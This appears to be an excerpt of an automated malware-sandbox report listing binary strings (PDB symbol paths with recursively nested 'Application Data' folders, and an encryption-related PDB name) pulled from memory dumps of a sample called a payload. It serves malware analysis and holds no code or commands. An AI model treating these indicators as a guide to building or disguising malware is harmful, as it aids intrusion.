                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\a\ source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2315414414.0000000003EA3000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2322324444.0000000003EBB000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2320973138.0000000003EAA000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\a\5 source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2310523825.0000000003EB3000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ry\\ source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2315414414.0000000003EA3000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2322324444.0000000003EBB000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2320973138.0000000003EAA000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb.cdqw source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2232512939.0000000003C32000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2232315956.0000000003BA2000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\a\\ source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2273490567.0000000003C47000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2274386033.0000000003CA5000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2273727258.0000000003C73000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.1964607470.0000000003AD0000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2294187046.0000000003EE3000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2292702111.0000000003EE2000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\I source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2294187046.0000000003EE3000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2284499187.0000000003EE2000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2292702111.0000000003EE2000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\*ta\ source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2310523825.0000000003EB3000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdbI source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\] source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2332585421.0000000004035000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2333358310.000000000407D000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2332101728.0000000003EB3000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2282440855.0000000003C7B000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2282081320.0000000003C58000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2292648224.0000000003C65000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2341825344.0000000003C86000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2273490567.0000000003C47000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2315115698.0000000003C5C000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2254663516.0000000003C5D000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2320687899.0000000003C5C000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2310618606.0000000003C56000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2313914869.0000000003C5C000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2332695677.0000000003C7B000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2292043905.0000000003C56000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2360091492.0000000003C8E000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2282440855.0000000003C7B000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2254323097.0000000003B39000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2255092558.0000000003B4C000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2273727258.0000000003C73000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2323157191.0000000003C87000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2316085239.0000000003C6D000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196da
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\\ source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2255239356.0000000003B10000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2232801684.0000000003B10000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2283227870.0000000003B8A000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2282602345.0000000003B34000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2274135225.0000000003B56000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2285187489.0000000003B94000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2325051592.000000000403C000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\r source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2315825658.00000000036E7000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2316766566.00000000036EC000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2295876636.00000000036EC000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2311135636.00000000036E7000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\]F source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2358481329.0000000003F52000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2341385936.0000000003F42000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2232512939.0000000003BC3000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2232315956.0000000003BA2000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\\9W source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2254323097.0000000003B39000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2255092558.0000000003B4C000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2255564557.0000000003B5C000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\/ source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2341959833.0000000003B24000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2348441168.0000000003B2B000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2342176452.0000000003B27000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\s source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2333405264.0000000003F5B000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2358481329.0000000003F52000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2341385936.0000000003F42000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdbache133408907975188232.txt source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2232512939.0000000003C32000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\y\ source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2292648224.0000000003C65000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2341825344.0000000003C86000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2273490567.0000000003C47000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2315115698.0000000003C5C000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2254663516.0000000003C5D000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2320687899.0000000003C5C000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2310618606.0000000003C56000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2313914869.0000000003C5C000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2332695677.0000000003C7B000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2292043905.0000000003C56000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2360091492.0000000003C8E000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2282440855.0000000003C7B000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2273727258.0000000003C73000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2323157191.0000000003C87000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2316085239.0000000003C6D000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2316719842.0000000003C79000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2310756662.0000000003C87000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2282081320.0000000003CE4000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\a\* source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2283589949.0000000003B1B000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2282602345.0000000003B14000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2283629174.0000000003B1F000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2285216220.0000000003B27000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb.cdqw' source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2232512939.0000000003C32000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2232512939.0000000003BC3000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2232315956.0000000003BA2000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2044311129.000000000369A000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2044529317.00000000036A0000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2315414414.0000000003EA3000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2315825658.00000000036E7000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2316766566.00000000036EC000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2310523825.0000000003EEC000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2311135636.00000000036E7000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2294187046.0000000003EE3000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2309862085.0000000003F03000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2292702111.0000000003EE2000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\\UWP4? source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2282081320.0000000003C58000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2333405264.0000000003F5B000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2358481329.0000000003F52000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2341385936.0000000003F42000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\w**s source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2273955613.00000000036E1000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2255008158.00000000036EE000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2274505062.00000000036FA000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2274054462.00000000036EE000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\e\e\ source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2323506783.0000000003F3B000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2323100107.0000000003F23000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2314739889.0000000003F03000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2322324444.0000000003EE2000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2319577426.0000000003ECB000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdbL source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2232512939.0000000003C32000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2232512939.0000000003C32000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error.cdqw source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2232512939.0000000003C32000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2232315956.0000000003BA2000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2293986477.0000000003B27000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2295241780.0000000003B2F000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2292390530.0000000003B09000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2310270639.0000000003B32000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2295203158.0000000003B51000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2351367972.0000000003C9A000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2340729338.0000000003C97000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2337425529.0000000003C82000.00000004.00000020.00020000.00000000.sdmp
